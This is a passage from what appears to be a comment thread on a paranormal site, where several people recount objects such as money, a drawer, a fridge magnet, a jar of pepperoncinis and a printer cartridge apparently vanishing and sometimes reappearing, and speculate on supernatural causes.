This is the second time this happened. The first time it was a smaller amount again from different stacks. This time the money was secured in a safe.

This only started happening after my husband passed away. He and I were the only two who knew the combination to the safe.

The first time I simply thought I miss checked the money and at the source of collection and blamed myself for not counting it properly upon receipt.

The second time around I was shocked and scared that robbers may have gased my house while we were asleep and robbed the placed. But then why would a robber take money from all three stacks and not just take it all? I was really hurt up to this day can’t explain it.

Strangely, I still try to come up with logical was how it went missing and sum up that I was robbed some how .

DOP has happened to me twice that I know of. First time was after we moved to a new, big house, lots of boxes and dresser drawers sitting around. One drawer in particular was next to the kitchen door, so I saw the drawer lots of times. Then it was time to put the drawer in the dresser and it was not there. I looked all over the house, and ran my hand over all the items in that room to make sure I looked closely at everything. Not there. So I went on with unpacking, and a couple of hours later the drawer reappeared in the same place, next to the kitchen door. I was so freaked. No one was with me in the house that day, so it couldn’t have been anyone else moving it. The second experience with DOP was in a different house. All unpacked. There was a bottle jack sitting on the patio for a couple of weeks. When husband needed the jack finally, I went to retrieve it; missing. I asked husband if he had moved it, answer was no. So I looked again on the patio, felt around where it had been. A few hours later it reappeared right where it had been. My theory at the time was that my deceased mother had moved the things to let me know she was watching over me. Seems simplistic in light of quantum mechanics or whatever, but at least there’s a likely motive.

This has happened to me as well omg! Firsty eyebrow brushes. I always put it in my bag and use iy every morning before school. One morning, I couldn’t find it there. That time, I thought maybe it got under the bed or I left it somewhere around the house. I skipped doing my eyebrows that time cause I’m gonna be late. But when I decided to look for it, all around the house, my bag everywhere… I couldn’t find it. I bought another eyebrow brush and after a few weeks, the same thing happened. It’s so annoying tbh

  99. Avatar David says:

Yep, just happened to me as well. I was at my fridge putting away milk when I felt my sleeve brush against the door and knocking loose a large fridge magnet that I always have on there. It’s fairly large, about three inches wide and I heard a single “klonk” as it landed on the floor.

Well, it wasn’t on the floor. It wasn’t anywhere. I was so baffled (and amused) that I grabbed a flashlight and went through every nook and cranny I could. Under the fridge, above the fridge, inside the fridge. I even opened the cereal box I previously used to see if it somehow fell in there. Nothing. It absolutely disappeared and I’m 100% sure if was there that morning. The sound it made of falling onto the floor, was proof enough to me that something fell at least. But nothing was found.

I like the idea of objects entering into another dimension, but its such a wild idea because there doesn’t seem to be any reason for it. The mechanism behind such a thing doesn’t many any sense. But if I spent twenty minutes searching all around the fridge and its nowhere to be found, what other explanation is there?

  100. Avatar MPH says:

I believe I posted this in the incorrect forum, so I’m reposting here

I experienced a DOP yesterday which was just a few hours ago from me typing this as it’s just after Midnight. This is the second time in my life that I had experienced this and the first was about 1 year ago. I will tell both of my experiences but first would like to share something that is interesting that may have significance with DOP phenomena.

Back in 1990 I was 7 years old and during that year I had moved into my Grandmother’s house with my Mother. My Grandmother let us live there because she decided to live out the rest of her retirement with her husband in Mexico. After getting settled in and living in this house for a couple of months a strange thing started happening where my Mother or I would find keys laying on the kitchen table. These keys seemingly came from nowhere and went to nothing as my Mother tried to fit every single one of these mysteriously appeared keys into every single lock in and around the house which no key ever successfully did. We ended up living their for 8 years but this strange phenomena of keys appearing to be found on the kitchen table had lasted for about the first 2 years of living there. After it was all done we had 3 bowls full of these keys.

Now getting to my DOP experiences the first one happened just a little over 1 year ago in the same place that I am still living at. I had just gotten home from grocery shopping and had put all my groceries away and had started a movie to watch in the living room. I thought about the jar of pepperoncinis I had bought and just put away, in the same exact place as always, the refrigerator door. Wanting to snack on them during the movie I went to grab them and low and behold they’re not in the door of the fridge where I specifically remembered putting them, they’re not anywhere in the fridge, they weren’t in any of the plastic grocery bags that were all emptied out, I even checked the garbage, all the cupboards, under the kitchen table, under the sink, etc etc. After checking everywhere thoroughly I ended up walking back to the living room and thinking this is so stupid they HAVE to be in the fridge, so I seriously like a crazy person walked back and forth from my living room to the fridge about 10 times in 10 minutes being just as baffled and bewildered the same when I’d open the fridge door and it was nowhere in there. So after all that I had finally just given up on it but was no less disturbed about it and decided to just go lay down in my bed. I honestly don’t remember if I actually fell asleep or if I just zoned out in thought but at least a couple hours had passed and I wanted some water so I walk to the kitchen and right in the center of the kitchen tile floor is the jar of pepperoncini’s. I mean right in the middle where you couldn’t even walk through the kitchen without kicking them over as it is not a wide area. I bent down to pick them up and saw that there was condensation all over it and running down the sides and the jar was cold. I could only say “WTF!” to myself over and over literally as the only explanation I could think of was that some invisible person or force was basically trolling me!

My 2nd experience which happened a few hours ago from typing this happened at my Grandmother’s house, the same one where the keys appeared. I was over at her house to set up her new printer, a very easy task to do when things don’t disappear. I opened the box and pulled the printer out and placed it on her computer desk and all it needed was to be plugged in and have the ink cartridges installed and job is done. So after plugging the printer in I grabbed the ink cartridges which were in a sealed see through bag that was unopened and I could see all 4 cartridges in the sealed bag, CMYK. I put the sealed bag of ink cartridges on my lap and wheeled over to the printer as I’m sitting in the office chair. I tear open the bag and grab a cartridge to put in the printer, which I do, then look down at the bag in my lap to grab the next one and there’s only 2 left. So, somehow when just a few seconds ago all 4 were present but now all of the sudden Magenta is missing. Nowhere to be found. Being depressed as of late this made me so irate, I was so pissed off and cussing up a storm just madder than hell. I lied to my Grandmother and said the company forgot to package it because I couldn’t tell her well yeah “it disapeared” and what, “better luck next time”? I was feeling pretty bad about losing my temper and cussing like that in front of my Grandmother and then having to lie to her so I just wanted to remove myself from dealing with the cartridge issue and cleared my mind and calmed down while taking out her garbage and tidying up a bit. When I was more settled down I returned to the printer to contemplate what I would do and after a couple minutes I figured oh well I’ll have to buy her a single Magenta ink cartridge, which oddly enough was all sold out on Amazon so I had to instead buy the full color pack just so she could get the Magenta. I bought the pack on Amazon and then about 1-2 min after doing so I found the Magenta cartridge which was wedged tight between the computer and the wall of the cubby hole (whatever you call it) under the desk where the computer sits. Even though this would be impossible, barring a scenario where I blacked out and put it there myself, I was relieved to have found it and now able to get the printer set up for her. One little thing that made me laugh though was after I got her printer installed and working I was sitting in her chair thinking about the situation that had happened and eyed a gift bag she had up on top of her computer desk (she never throws away those gift bags) and it was a “Trolls” theme gift bag. I wish I was in a better state of mind to have handled this experience differently but overall I hope it doesn’t happen again to me ever.
